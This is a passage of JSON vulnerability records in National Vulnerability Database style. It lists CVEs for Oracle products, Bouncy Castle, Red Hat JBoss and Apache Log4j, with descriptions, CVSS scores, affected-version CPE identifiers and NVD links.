"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2018-01-18T02:29:00", "type": "cve", "title": "CVE-2018-2561", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2561"], "modified": "2018-01-25T13:53:00", "cpe": ["cpe:/a:oracle:http_server:11.1.1.9.0", "cpe:/a:oracle:http_server:11.1.1.7.0", "cpe:/a:oracle:http_server:12.2.1.2.0", "cpe:/a:oracle:http_server:12.2.1.3.0", "cpe:/a:oracle:http_server:12.1.3.0.0"], "id": "CVE-2018-2561", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2561", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:oracle:http_server:11.1.1.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:http_server:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:http_server:12.2.1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:http_server:11.1.1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:http_server:12.2.1.3.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T14:51:25", "description": "Vulnerability in the Hyperion Data Relationship Management component of Oracle Hyperion (subcomponent: Access and security). The supported version that is affected is 11.1.2.4.330. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Hyperion Data Relationship Management. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Hyperion Data Relationship Management accessible data. CVSS 3.0 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2018-01-18T02:29:00", "type": "cve", "title": "CVE-2018-2610", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2610"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/a:oracle:hyperion_data_relationship_management:11.1.2.4.330"], "id": "CVE-2018-2610", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2610", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:oracle:hyperion_data_relationship_management:11.1.2.4.330:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T14:48:50", "description": "Unspecified vulnerability in the Enterprise Manager Ops Center component in Oracle Enterprise Manager Grid Control 12.1.4, 12.2.2, and 12.3.2; the Oracle Health Sciences Information Manager component in Oracle Health Sciences Applications 1.2.8.3, 2.0.2.3, and 3.0.1.0; the Oracle Healthcare Master Person Index component in Oracle Health Sciences Applications 2.0.12, 3.0.0, and 4.0.1; the Oracle Documaker component in Oracle Insurance Applications before 12.5; the Oracle Insurance Calculation Engine component in Oracle Insurance Applications 9.7.1, 10.1.2, and 10.2.2; the Oracle Insurance Policy Administration J2EE and Oracle Insurance Rules Palette components in Oracle Insurance Applications 9.6.1, 9.7.1, 10.0.1, 10.1.2, 10.2.0, and 10.2.2; the Oracle Retail Integration Bus component in Oracle Retail Applications 15.0; the Oracle Retail Order Broker component in Oracle Retail Applications 5.1, 5.2, and 15.0; the Primavera Contract Management component in Oracle Primavera Products Suite 14.2; the Primavera P6 Enterprise Project Portfolio Management component in Oracle Primavera Products Suite 8.2, 8.3, 8.4, 15.1, 15.2, and 16.1; the Oracle Financial Services Analytical Applications Infrastructure component in Oracle Financial Services Applications 8.0.0, 8.0.1, 8.0.2, and 8.0.3; the Oracle Commerce Guided Search / Oracle Commerce Experience Manager component in Oracle Commerce 3.1.1, 3.1.2, 11.0, 11.1, and 11.2; the Oracle Agile PLM component in Oracle Supply Chain Products Suite 9.3.4 and 9.3.5; the Oracle Communications BRM - Elastic Charging Engine 11.2.0.0.0 and 11.3.0.0.0; the Oracle Enterprise Repository Enterprise Repository 12.1.3.0.0; the Oracle Financial Services Behavior Detection Platform 8.0.1 and 8.0.2; the Oracle Hyperion Essbase 12.2.1.1; the Oracle Tuxedo System and Applications Monitor (TSAM) 11.1.1.2.0, 11.1.1.2.1, 11.1.1.2.1, 12.1.1.1.0, 12.1.3.0.0, and 12.2.2.0.0; the Oracle Communications WebRTC Session Controller component of Oracle Communications Applications (subcomponent: Security (Spring)) 7.0, 7.1 and 7.2; the Oracle Endeca Information Discovery Integrator 3.2; the Converged Commerce component of Oracle Retail Applications 16.0.1; the Oracle Identity Manager 11.1.2.3.0; Oracle Enterprise Manager for MySQL Database 12.1.0.4; Oracle Retail Invoice Matching 12.0, 13.0, 13.1, 13.2, 14.0, and 14.1; Oracle Communications Performance Intelligence Center (PIC) Software Prior to 10.2.1 and the Oracle Knowledge component of Oracle Siebel CRM (subcomponent: AnswerFlow (Spring Framework)) version 8.5.1.0 - 8.5.1.7 and 8.6.0 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-07-21T10:12:00", "type": "cve", "title": "CVE-2016-0635", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0635"], "modified": "2019-04-23T19:29:00", "cpe": ["cpe:/a:oracle:healthcare_master_person_index:2.0.12", "cpe:/a:oracle:insurance_rules_palette:9.7.1", "cpe:/a:oracle:insurance_policy_administration_j2ee:10.0.1", "cpe:/a:oracle:retail_integration_bus:15.0", "cpe:/a:oracle:primavera_p6_enterprise_project_portfolio_management:8.4", "cpe:/a:oracle:retail_order_broker_cloud_service:15.0", "cpe:/a:oracle:insurance_rules_palette:10.2.2", "cpe:/a:oracle:primavera_p6_enterprise_project_portfolio_management:8.3", "cpe:/a:oracle:enterprise_manager_ops_center:12.1.4", "cpe:/a:oracle:primavera_p6_enterprise_project_portfolio_management:15.1", "cpe:/a:oracle:health_sciences_information_manager:1.2.8.3", "cpe:/a:oracle:insurance_calculation_engine:9.7.1", "cpe:/a:oracle:primavera_p6_enterprise_project_portfolio_management:16.1", "cpe:/a:oracle:healthcare_master_person_index:3.0.0", "cpe:/a:oracle:insurance_rules_palette:10.2.0", "cpe:/a:oracle:primavera_p6_enterprise_project_portfolio_management:15.2", "cpe:/a:oracle:enterprise_manager_ops_center:12.3.2", "cpe:/a:oracle:insurance_rules_palette:10.0.1", "cpe:/a:oracle:enterprise_manager_ops_center:12.2.2", "cpe:/a:oracle:primavera_contract_management:14.2", "cpe:/a:oracle:primavera_p6_enterprise_project_portfolio_management:8.2", "cpe:/a:oracle:insurance_policy_administration_j2ee:10.2.0", "cpe:/a:oracle:insurance_policy_administration_j2ee:9.6.1", "cpe:/a:oracle:retail_order_broker_cloud_service:5.1", "cpe:/a:oracle:health_sciences_information_manager:2.0.2.3", "cpe:/a:oracle:retail_order_broker_cloud_service:5.2", "cpe:/a:oracle:insurance_calculation_engine:10.1.2", "cpe:/a:oracle:insurance_rules_palette:10.1.2", "cpe:/a:oracle:healthcare_master_person_index:4.0.1", "cpe:/a:oracle:insurance_policy_administration_j2ee:10.2.2", "cpe:/a:oracle:insurance_policy_administration_j2ee:9.7.1", "cpe:/a:oracle:insurance_rules_palette:9.6.1", "cpe:/a:oracle:insurance_calculation_engine:10.2.2", "cpe:/a:oracle:health_sciences_information_manager:3.0.1.0", "cpe:/a:oracle:documaker:12.5", "cpe:/a:oracle:insurance_policy_administration_j2ee:10.1.2"], "id": "CVE-2016-0635", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0635", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:oracle:healthcare_master_person_index:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_calculation_engine:10.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:documaker:12.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:10.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_calculation_engine:9.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:health_sciences_information_manager:1.2.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:9.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:9.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:health_sciences_information_manager:3.0.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_order_broker_cloud_service:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:8.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_calculation_engine:10.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:9.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_order_broker_cloud_service:5.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_contract_management:14.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:healthcare_master_person_index:2.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_order_broker_cloud_service:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:15.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:health_sciences_information_manager:2.0.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:16.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:10.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:15.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:8.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:healthcare_master_person_index:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:9.7.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T14:51:54", "description": "Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: Security Framework). Supported versions that are affected are 11.1.1.2.4, 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle JDeveloper. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle JDeveloper accessible data as well as unauthorized update, insert or delete access to some of Oracle JDeveloper accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 4.7}, "published": "2018-01-18T02:29:00", "type": "cve", "title": "CVE-2018-2711", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2711"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:jdeveloper:11.1.1.7.0", "cpe:/a:oracle:jdeveloper:12.1.3.0.0", "cpe:/a:oracle:jdeveloper:11.1.1.2.4", "cpe:/a:oracle:jdeveloper:11.1.1.7.1", "cpe:/a:oracle:jdeveloper:11.1.1.9.0"], "id": "CVE-2018-2711", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2711", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:11.1.1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:11.1.1.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:11.1.1.7.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T14:51:23", "description": "Vulnerability in the Hyperion BI+ component of Oracle Hyperion (subcomponent: Foundation UI & Servlets). The supported version that is affected is 11.1.2.4. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Hyperion BI+. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Hyperion BI+ accessible data as well as unauthorized read access to a subset of Hyperion BI+ accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Hyperion BI+. CVSS 3.0 Base Score 4.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L).", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "baseScore": 4.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.4}, "published": "2018-01-18T02:29:00", "type": "cve", "title": "CVE-2018-2595", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2595"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:hyperion_bi\\+:11.1.2.4"], "id": "CVE-2018-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2595", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:hyperion_bi\\+:11.1.2.4:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T14:32:05", "description": "The Bouncy Castle Java library before 1.51 does not validate a point is withing the elliptic curve, which makes it easier for remote attackers to obtain private keys via a series of crafted elliptic curve Diffie Hellman (ECDH) key exchanges, aka an \"invalid curve attack.\"", "cvss3": {}, "published": "2015-11-09T16:59:00", "type": "cve", "title": "CVE-2015-7940", "cwe": ["CWE-310", "CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7940"], "modified": "2019-01-16T19:29:00", "cpe": ["cpe:/a:oracle:virtual_desktop_infrastructure:3.5.2", "cpe:/a:oracle:enterprise_manager_ops_center:12.2.2", "cpe:/a:oracle:application_testing_suite:12.5.0.1", "cpe:/a:oracle:enterprise_manager_ops_center:12.1.4", "cpe:/o:opensuse:leap:42.1", "cpe:/o:opensuse:opensuse:13.2", "cpe:/a:bouncycastle:bouncy_castle_crypto_package:1.50", "cpe:/a:oracle:application_testing_suite:12.5.0.2", "cpe:/a:oracle:peoplesoft_enterprise_peopletools:8.55", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:oracle:application_testing_suite:12.5.0.3", "cpe:/a:oracle:peoplesoft_enterprise_peopletools:8.54"], "id": "CVE-2015-7940", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7940", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:oracle:application_testing_suite:12.5.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:12.5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:virtual_desktop_infrastructure:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:12.5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.55:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.54:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:bouncycastle:bouncy_castle_crypto_package:1.50:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T14:30:01", "description": "Red Hat JBoss A-MQ 6.x; BPM Suite (BPMS) 6.x; BRMS 6.x and 5.x; Data Grid (JDG) 6.x; Data Virtualization (JDV) 6.x and 5.x; Enterprise Application Platform 6.x, 5.x, and 4.3.x; Fuse 6.x; Fuse Service Works (FSW) 6.x; Operations Network (JBoss ON) 3.x; Portal 6.x; SOA Platform (SOA-P) 5.x; Web Server (JWS) 3.x; Red Hat OpenShift/xPAAS 3.x; and Red Hat Subscription Asset Manager 1.3 allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections (ACC) library.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-09T17:29:00", "type": "cve", "title": "CVE-2015-7501", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2020-07-15T03:15:00", "cpe": ["cpe:/a:redhat:jboss_a-mq:6.0.0", "cpe:/a:redhat:jboss_enterprise_application_platform:5.0.0", "cpe:/a:redhat:jboss_fuse:6.0.0", "cpe:/a:redhat:jboss_data_virtualization:5.0.0", "cpe:/a:redhat:jboss_enterprise_brms_platform:5.0.0", "cpe:/a:redhat:jboss_enterprise_application_platform:6.0.0", "cpe:/a:redhat:jboss_operations_network:3.0", "cpe:/a:redhat:xpaas:3.0.0", "cpe:/a:redhat:data_grid:6.0.0", "cpe:/a:redhat:jboss_enterprise_brms_platform:6.0.0", "cpe:/a:redhat:jboss_portal:6.0.0", "cpe:/a:redhat:subscription_asset_manager:1.3.0", "cpe:/a:redhat:jboss_fuse_service_works:6.0", "cpe:/a:redhat:jboss_bpm_suite:6.0.0", "cpe:/a:redhat:openshift:3.0", "cpe:/a:redhat:jboss_enterprise_soa_platform:5.0.0", "cpe:/a:redhat:jboss_enterprise_web_server:3.0.0", "cpe:/a:redhat:jboss_enterprise_application_platform:4.3.0", "cpe:/a:redhat:jboss_data_virtualization:6.0.0"], "id": "CVE-2015-7501", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7501", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:redhat:jboss_enterprise_application_platform:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_enterprise_soa_platform:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_fuse_service_works:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_data_virtualization:6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:xpaas:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_operations_network:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_bpm_suite:6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_enterprise_web_server:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_data_virtualization:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_fuse:6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:openshift:3.0:*:*:*:enterprise:*:*:*", "cpe:2.3:a:redhat:jboss_enterprise_brms_platform:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_enterprise_application_platform:6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:subscription_asset_manager:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_portal:6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:data_grid:6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_enterprise_application_platform:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_a-mq:6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_enterprise_brms_platform:6.0.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T14:51:22", "description": "Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Advanced UI). The supported version that is affected is 11.1.1.8.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data. CVSS 3.0 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2018-01-18T02:29:00", "type": "cve", "title": "CVE-2018-2584", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2584"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/a:oracle:webcenter_sites:11.1.1.8.0"], "id": "CVE-2018-2584", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2584", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:oracle:webcenter_sites:11.1.1.8.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T15:22:26", "description": "In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-17T21:59:00", "type": "cve", "title": "CVE-2017-5645", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 